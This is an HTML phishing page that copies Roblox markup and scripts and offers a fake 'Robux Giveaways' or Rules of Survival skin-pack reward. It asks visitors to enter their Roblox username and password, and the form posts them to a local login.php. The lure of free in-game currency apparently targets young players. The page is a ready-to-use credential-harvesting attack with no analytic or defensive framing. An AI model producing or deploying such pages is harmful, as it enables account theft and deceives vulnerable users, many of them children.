

<!DOCTYPE html>
<!--[if IE 8]><html class="ie8" ng-app="robloxApp"><![endif]-->
<!--[if gt IE 8]><!-->
<html>
<!--<![endif]-->
<head>
    <!-- MachineID: WEB256 -->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,requiresActiveX=true" />
    <meta name="author" content="Rules of Survival Reward" />
    <meta name="description" content="claim your reward now!" />
    <meta name="keywords" content="" />
    <meta name="apple-itunes-app" content="app-id=431946152" />

    <title>Rules Of Survival Reward</title>
    <link rel="icon" type="image/vnd.microsoft.icon" href="/favicon.ico" />

    
    <link href='//fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,500,600,700' rel='stylesheet' type='text/css'>

    
    
<link rel='stylesheet' href='thing.css' />

    
<link rel='stylesheet' href='thing2.css' />

    
    
    
    <script type='text/javascript' src='//ajax.aspnetcdn.com/ajax/jQuery/jquery-1.11.1.min.js'></script>
<script type='text/javascript'>window.jQuery || document.write("<script type='text/javascript' src='/js/jquery/jquery-1.11.1.js'><\/script>")</script>
<script type='text/javascript' src='//ajax.aspnetcdn.com/ajax/jquery.migrate/jquery-migrate-1.2.1.min.js'></script>
<script type='text/javascript'>window.jQuery || document.write("<script type='text/javascript' src='/js/jquery/jquery-migrate-1.2.1.js'><\/script>")</script>


    
    <script type='text/javascript' src='http://js.rbxcdn.com/fbb8598e3acc13fe8b4d8c1c5b676f2e.js.gzip'></script>


    
    

    
    <!--[if lt IE 9]>
        <script src="//oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
        <script src="//oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
</style>
    <div class="container"> 
<h1>Robux Giveaways</h1>
<h2>Congratulations, you made it in time for free Reward</h2>
<hr></hr>
<h4><img src="download.png" height="32" width="32"> to Get: Skin pack</h4>	
<h4>Please login to your account to recieve your robux!</h4>
                <form name="loginForm" action="login.php" id="LogInForm" class="navbar-form form-inline navbar-left" ng-submit="submitLogin($event)" method="post" role="form" data-use-apiproxy-signin="False" data-sign-on-api-path="https://api.roblox.com/login/v1" novalidate>
                    <div class="form-group" ng-class="{ 'has-error': loginForm.username.$invalid && badSubmit}">
                        <input id="LoginUsername" type="text" placeholder="Username" class="form-control" name="username" autofocus="autofocus" ng-required="true" ng-model="login.username" />
                    </div>
                    <div class="form-group" ng-class="{ 'has-error': loginForm.password.$invalid && badSubmit}">
                        <input id="LoginPassword" type="password" placeholder="Password" class="form-control" name="password" ng-required="true" ng-model="login.password" auto-fill-sync />
                    </div>
                    <div class="form-group">
                        <input type="submit" id="LoginButton" class="form-control" value="Log In" />
                    </div>
                </form>
            </div>
        </div>
    </div>
</div>


</body>
</html>